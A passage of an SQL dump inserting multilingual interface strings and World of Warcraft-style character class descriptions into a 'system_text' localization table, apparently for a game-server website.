`time_create`, `time_edit`) VALUES ('basic_placeholder_username', 'esES', 'peter@world.org', 0, 0, '2015-04-15 18:29:16', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_placeholder_username', 'frFR', 'peter@world.org', 0, 0, '2015-04-15 18:29:16', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_placeholder_username', 'jaJA', 'peter / peter@world.org', 0, 0, '2015-04-15 18:41:22', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_placeholder_username', 'trTR', 'peter@world.org', 0, 0, '2015-04-15 18:29:17', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_priority', 'deDE', 'Priorität', 1, 1, '2015-04-16 23:11:18', '2015-04-16 16:48:36'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_priority', 'enUS', 'Priority', 2, 1, '2015-04-16 23:11:18', '2015-04-16 23:11:18'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_progress', 'deDE', 'Fortschritt', 0, 0, '2015-04-16 23:14:43', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_progress', 'enUS', 'Progress', 2, 1, '2015-04-16 23:14:43', '2015-04-16 23:14:43'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_progress', 'frFR', 'Progès', 3, 3, '2015-04-20 14:07:33', '2015-04-20 14:07:33'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_progress', 'jaJA', '進展', 0, 0, '2015-04-16 23:14:43', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_project', 'deDE', 'Projekt', 0, 0, '2015-04-16 14:06:30', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_project', 'enUS', 'Project', 2, 1, '2015-04-16 23:06:03', '2015-04-16 23:06:03'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_project', 'frFR', 'Projet', 3, 3, '2015-04-20 14:07:00', '2015-04-20 14:07:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_project', 'jaJA', 'インフォメーション', 0, 0, '2015-04-16 14:06:30', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_refresh', 'deDE', 'Aktualisieren', 1, 1, '2015-04-16 23:11:18', '2015-04-16 16:48:36'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_refresh', 'enUS', 'Refresh', 2, 1, '2015-04-16 23:11:18', '2015-04-16 23:11:18'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_register', 'deDE', 'Registrieren', 0, 2, '2015-04-17 20:33:14', '2015-04-17 20:33:14'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_register', 'enUS', 'Register', 0, 0, '2015-04-15 18:29:16', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_register', 'frFR', 'Enregistrer', 3, 3, '2015-04-20 14:32:22', '2015-04-20 14:32:22'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_register', 'jaJA', 'サインオン', 0, 0, '2015-04-15 18:41:22', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_rename', 'deDE', 'Umbenenen', 1, 1, '2015-04-16 23:11:18', '2015-04-16 16:48:36'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_rename', 'enUS', 'Rename', 2, 1, '2015-04-16 23:11:18', '2015-04-16 23:11:18'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_report', 'deDE', 'Report', 1, 1, '2015-04-16 23:11:18', '2015-04-16 16:48:36'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_report', 'enUS', 'Report', 2, 1, '2015-04-16 23:11:18', '2015-04-16 23:11:18'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_rows', 'deDE', 'Zeilen', 2, 2, '2015-04-20 01:44:51', '2015-04-20 01:44:51'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_rows', 'enUS', 'Rows', 2, 2, '2015-04-18 14:42:23', '2015-04-18 14:42:23'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_rows', 'frFR', 'lignes', 3, 3, '2015-04-20 16:33:19', '2015-04-20 16:33:19'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_save', 'deDE', 'Speichern', 2, 2, '2015-04-20 01:46:06', '2015-04-20 01:46:06'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_save', 'enUS', 'Save', 2, 2, '2015-04-18 13:35:09', '2015-04-18 13:35:09'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_save', 'frFR', 'Mémoriser', 3, 3, '2015-04-20 16:29:38', '2015-04-20 16:29:38'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_search', 'deDE', 'Suchen', 1, 1, '2015-04-16 23:11:18', '2015-04-16 16:48:36'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_search', 'enUS', 'Search', 2, 1, '2015-04-16 23:11:18', '2015-04-16 23:11:18'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_send_email', 'deDE', 'EMail senden', 1, 1, '2015-04-16 23:11:18', '2015-04-16 16:48:36'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_send_email', 'enUS', 'send EMail', 2, 1, '2015-04-16 23:11:18', '2015-04-16 23:11:18'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_show_all', 'deDE', 'Alle anzeigen', 2, 2, '2015-04-20 01:44:40', '2015-04-20 01:44:40'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_show_all', 'enUS', 'Show All', 2, 2, '2015-04-18 13:25:13', '2015-04-18 13:25:13'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_show_all', 'frFR', 'Afficher tout', 3, 3, '2015-04-20 16:32:51', '2015-04-20 16:32:51'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_state_login', 'deDE', 'Du bist eingeloggt', 0, 2, '2015-04-17 20:32:08', '2015-04-17 20:32:08'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_state_login', 'enUS', 'You are logged in.', 0, 0, '2015-04-15 18:29:16', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_state_login', 'frFR', 'Tu es connecté!', 3, 3, '2015-04-20 14:30:21', '2015-04-20 14:30:21'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_status', 'deDE', 'Status', 0, 0, '2015-04-16 14:16:32', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_status', 'enUS', 'Status', 2, 1, '2015-04-16 23:27:32', '2015-04-16 23:27:32'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_status', 'frFR', 'Statut', 3, 3, '2015-04-20 14:19:07', '2015-04-20 14:19:07'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_status', 'jaJA', 'ステイタス', 0, 0, '2015-04-16 14:16:32', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_text_login', 'deDE', 'Logge Dich in deine Website ein.', 0, 2, '2015-04-17 20:33:54', '2015-04-17 20:33:54'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_text_login', 'enUS', 'Login to your Website.', 0, 0, '2015-04-15 18:29:16', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_text_login', 'frFR', 'Connecte sur ton site Web', 3, 3, '2015-04-18 04:52:46', '2015-04-18 04:52:46'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_text_login', 'jaJA', 'ログインする', 0, 0, '2015-04-15 18:41:22', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_text_logout', 'deDE', 'Logge Dich aus bevor Du gehst!', 0, 1, '2015-04-16 23:24:12', '2015-04-16 23:24:12'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_text_logout', 'enUS', 'Logout before you leave!', 0, 0, '2015-04-15 18:29:16', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_text_logout', 'frFR', 'Déconnecter avant partir!', 3, 3, '2015-04-20 14:16:21', '2015-04-20 14:16:21'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_text_logout', 'jaJA', '出て前にログアウトを忘れないでください。', 0, 0, '2015-04-16 14:41:25', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_text_password_miss', 'deDE', 'Can\'t really remember your Password?', 0, 2, '2015-04-17 20:34:38', '2015-04-17 20:34:38'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_text_password_miss', 'enUS', 'Can\'t really remember your Password?', 0, 0, '2015-04-15 18:29:16', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_text_password_miss', 'frFR', 'Tu te ne rappelles pas ton mot de passe?', 3, 3, '2015-04-20 16:22:13', '2015-04-20 16:22:13'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_text_password_miss', 'jaJA', 'パスワードを忘れた', 0, 0, '2015-04-15 18:41:22', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_text_register', 'deDE', 'Registriere einen Account', 0, 3, '2015-04-20 14:33:03', '2015-04-20 14:33:03'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_text_register', 'enUS', 'Register an Account', 0, 0, '2015-04-15 18:29:16', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_text_register', 'frFR', 'Enregistrer un compte', 3, 3, '2015-04-20 14:33:42', '2015-04-20 14:33:42'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_text_register', 'jaJA', 'サインオン', 0, 0, '2015-04-15 18:41:22', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_today', 'deDE', 'Heute', 1, 1, '2015-04-16 23:21:33', '2015-04-16 16:48:25'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_today', 'enUS', 'Today', 2, 1, '2015-04-16 23:21:33', '2015-04-16 23:21:33'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_today', 'frFR', 'Aujourd\'hui', 3, 3, '2015-04-18 04:55:23', '2015-04-18 04:55:23'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_today', 'jaJA', '今日', 1, 1, '2015-04-16 23:21:33', '2015-04-16 16:55:58'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_todo', 'deDE', 'Todo', 0, 0, '2015-04-16 14:16:32', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_todo', 'enUS', 'Todo', 2, 1, '2015-04-16 23:25:06', '2015-04-16 23:25:06'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_todo', 'jaJA', 'ToDoリスト', 2, 2, '2015-04-23 01:47:28', '2015-04-23 01:47:28'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_upload', 'deDE', 'Hochladen', 1, 1, '2015-04-16 23:11:18', '2015-04-16 16:48:36'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_upload', 'enUS', 'Upload', 2, 1, '2015-04-16 23:11:18', '2015-04-16 23:11:18'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_URL', 'deDE', 'URL', 0, 2, '2015-04-16 23:17:13', '2015-04-16 20:20:50'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_URL', 'enUS', 'URL', 2, 1, '2015-04-16 23:17:13', '2015-04-16 23:17:13'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_URL', 'jaJA', 'URL', 0, 0, '2015-04-16 23:17:13', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_user', 'deDE', 'Nutzer', 1, 1, '2015-04-16 23:11:18', '2015-04-16 16:48:36'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_user', 'enUS', 'User', 2, 1, '2015-04-16 23:11:18', '2015-04-16 23:11:18'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_username', 'deDE', 'Username', 0, 2, '2015-04-17 20:31:39', '2015-04-17 20:31:39'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_username', 'enUS', 'Username', 0, 0, '2015-04-15 18:29:16', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_username', 'frFR', 'Nom d\'usager', 3, 3, '2015-04-20 16:35:03', '2015-04-20 16:35:03'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_username', 'jaJA', '名前', 0, 0, '2015-04-15 18:41:22', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_username_long', 'deDE', 'Nutzername ist zu lang', 0, 2, '2015-04-18 13:17:11', '2015-04-18 13:17:11'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_username_long', 'enUS', 'Username is too long', 0, 0, '2015-04-18 13:17:11', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_username_long', 'frFR', 'Nom d\'utilisateur trop long!', 3, 3, '2015-04-20 16:26:21', '2015-04-20 16:26:21'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_username_miss', 'deDE', 'Nutzername benötigt', 0, 2, '2015-04-21 03:40:25', '2015-04-21 03:40:25'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_username_miss', 'enUS', 'Username required', 0, 0, '2015-04-18 13:17:25', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_username_miss', 'frFR', 'Nom d\'utilisateur est nécessaire!', 2, 2, '2015-04-21 03:40:34', '2015-04-21 03:40:34'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_username_short', 'deDE', 'Nutzername zu kurz', 0, 2, '2015-04-21 03:38:57', '2015-04-21 03:38:57'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_username_short', 'enUS', 'Username is too short', 0, 0, '2015-04-18 13:17:37', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_username_short', 'frFR', 'Nom d\'utilisateur trop court!', 2, 2, '2015-04-21 03:39:06', '2015-04-21 03:39:06'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_users', 'deDE', 'Nutzer', 1, 1, '2015-04-16 23:26:08', '2015-04-16 16:47:59'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_users', 'enUS', 'Users', 2, 1, '2015-04-16 23:26:08', '2015-04-16 23:26:08'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_users', 'frFR', 'Utilisateurs', 3, 3, '2015-04-20 19:18:29', '2015-04-20 19:18:29'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_users', 'jaJA', '利用者', 1, 1, '2015-04-16 23:26:08', '2015-04-16 17:00:22'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_week', 'deDE', 'Woche', 1, 1, '2015-04-16 23:11:18', '2015-04-16 16:48:36'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_week', 'enUS', 'Week', 2, 1, '2015-04-16 23:11:18', '2015-04-16 23:11:18'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_week', 'frFR', 'Semaine', 3, 3, '2015-04-18 04:53:07', '2015-04-18 04:53:07'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_week', 'jaJA', '週', 1, 1, '2015-04-16 23:11:18', '2015-04-16 16:54:02'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('character_name', 'deDE', 'Charakter Name', 0, 0, '2015-05-23 12:00:44', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('character_name', 'enUS', 'character name', 0, 0, '2015-05-23 12:00:44', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('class_druid', 'deDE', 'Druid
Druids harness the vast powers of nature to preserve balance and protect life. With experience, druids can unleash nature’s raw energy against their enemies, raining celestial fury on them from a great distance, binding them with enchanted vines, or ensnaring them in unrelenting cyclones.', 0, 0, '2015-05-23 12:00:44', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('class_druid', 'enUS', 'Druid
Druids harness the vast powers of nature to preserve balance and protect life. With experience, druids can unleash nature’s raw energy against their enemies, raining celestial fury on them from a great distance, binding them with enchanted vines, or ensnaring them in unrelenting cyclones.', 0, 0, '2015-05-23 12:00:44', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('class_hunter', 'deDE', 'Hunter
From an early age the call of the wild draws some adventurers from the comfort of their homes into the unforgiving primal world outside. Those who endure become hunters. Masters of their environment, they are able to slip like ghosts through the trees and lay traps in the paths of their enemies.', 0, 0, '2015-05-23 12:00:44', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('class_hunter', 'enUS', 'Hunter
From an early age the call of the wild draws some adventurers from the comfort of their homes into the unforgiving primal world outside. Those who endure become hunters. Masters of their environment, they are able to slip like ghosts through the trees and lay traps in the paths of their enemies.', 0, 0, '2015-05-23 12:00:44', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('class_paladin', 'deDE', 'Paladin

This is the call of the paladin: to protect the weak, to bring justice to the unjust, and to vanquish evil from the darkest corners of the world. These holy warriors are equipped with plate armor so they can confront the toughest of foes, and the blessing of the Light allows them to heal wounds and, in some cases, even restore life to the dead.', 0, 0, '2015-05-23 12:00:44', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('class_paladin', 'enUS', 'Paladin
This is the call of the paladin: to protect the weak, to bring justice to the unjust, and to vanquish evil from the darkest corners of the world. These holy warriors are equipped with plate armor so they can confront the toughest of foes, and the blessing of the Light allows them to heal wounds and, in some cases, even restore life to the dead.', 0, 0, '2015-05-23 12:00:44', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('class_priest', 'deDE', 'Priest
Priests are devoted to the spiritual, and express their unwavering faith by serving the people. For millennia they have left behind the confines of their temples and the comfort of their shrines so they can support their allies in war-torn lands. In the midst of terrible conflict, no hero questions the value of the priestly orders.', 0, 0, '2015-05-23 12:00:44', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('class_priest', 'enUS', 'Priest
Priests are devoted to the spiritual, and express their unwavering faith by serving the people. For millennia they have left behind the confines of their temples and the comfort of their shrines so they can support their allies in war-torn lands. In the midst of terrible conflict, no hero questions the value of the priestly orders.', 0, 0, '2015-05-23 12:00:44', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('class_rogue', 'deDE', 'Rogue
For rogues, the only code is the contract, and their honor is purchased in gold. Free from the constraints of a conscience, these mercenaries rely on brutal and efficient tactics. Lethal assassins and masters of stealth, they will approach their marks from behind, piercing a vital organ and vanishing into the shadows before the victim hits the ground.', 0, 0, '2015-05-23 12:00:44', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('class_rogue', 'enUS', 'Rogue
For rogues, the only code is the contract, and their honor is purchased in gold. Free from the constraints of a conscience, these mercenaries rely on brutal and efficient tactics. Lethal assassins and masters of stealth, they will approach their marks from behind, piercing a vital organ and vanishing into the shadows before the victim hits the ground.', 0, 0, '2015-05-23 12:00:44', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('class_shaman', 'deDE', 'Shaman
Shaman are spiritual guides and practitioners, not of the divine, but of the very elements. Unlike some other mystics, shaman commune with forces that are not strictly benevolent. The elements are chaotic, and left to their own devices, they rage against one another in unending primal fury. It is the call of the shaman to bring balance to this chaos. Acting as moderators among earth, fire, water, and air, shaman summon totems that focus the elements to support the shaman’s allies or punish those who threaten them.', 0, 0, '2015-05-23 12:00:44', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('class_shaman', 'enUS', 'Shaman
Shaman are spiritual guides and practitioners, not of the divine, but of the very elements. Unlike some other mystics, shaman commune with forces that are not strictly benevolent. The elements are chaotic, and left to their own devices, they rage against one another in unending primal fury. It is the call of the shaman to bring balance to this chaos. Acting as moderators among earth, fire, water, and air, shaman summon totems that focus the elements to support the shaman’s allies or punish those who threaten them.', 0, 0, '2015-05-23 12:00:44', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('class_warlock', 'deDE', 'Warlock
In the face of demonic power, most heroes see death. Warlocks see only opportunity. Dominance is their aim, and they have found a path to it in the dark arts. These voracious spellcasters summon demonic minions to fight beside them. At first, they command only the service of imps, but as a warlock’s knowledge grows, seductive succubi, loyal voidwalkers, and horrific felhunters join the dark sorcerer’s ranks to wreak havoc on anyone who stands in their master’s way.', 0, 0, '2015-05-23 12:00:44', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('class_warlock', 'enUS', 'Warlock
In the face of demonic power, most heroes see death. Warlocks see only opportunity. Dominance is their aim, and they have found a path to it in the dark arts. These voracious spellcasters summon demonic minions to fight beside them. At first, they command only the service of imps, but as a warlock’s knowledge grows, seductive succubi, loyal voidwalkers, and horrific felhunters join the dark sorcerer’s ranks to wreak havoc on anyone who stands in their master’s way.', 0, 0, '2015-05-23 12:00:44', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('class_warrior', 'deDE', 'Warrior
For as long as war has raged, heroes from every race have aimed to master the art of battle. Warriors combine strength, leadership, and a vast knowledge of arms and armor to wreak havoc in glorious combat. Some protect from the front lines with shields, locking down enemies while allies support the warrior from behind with spell and bow. Others forgo the shield and unleash their rage at the closest threat with a variety of deadly weapons.', 0, 0, '2015-05-23 12:00:44', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('class_warrior', 'enUS', 'Warrior
For as long as war has raged, heroes from every race have aimed to master the art of battle. Warriors combine strength, leadership, and a vast knowledge of arms and armor to wreak havoc in glorious combat. Some protect from the front lines with shields, locking down enemies while allies support the warrior from behind with spell and bow. Others forgo the shield and unleash their rage at the closest threat with a variety of deadly weapons.', 0, 0, '2015-05-23 12:00:44', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('client_version', 'deDE', '1.12.1/1.12.2', 0, 0, '2015-05-23 12:00:44', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('client_version', 'enUS', '1.12.1/1.12.2', 0, 0, '2015-05-23 12:00:44', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('database_version', 'deDE', 'mojo', 0, 0, '2015-05-23 12:00:44', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('database_version', 'enUS', 'mojo', 0, 0, '2015-05-23 12:00:44', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, 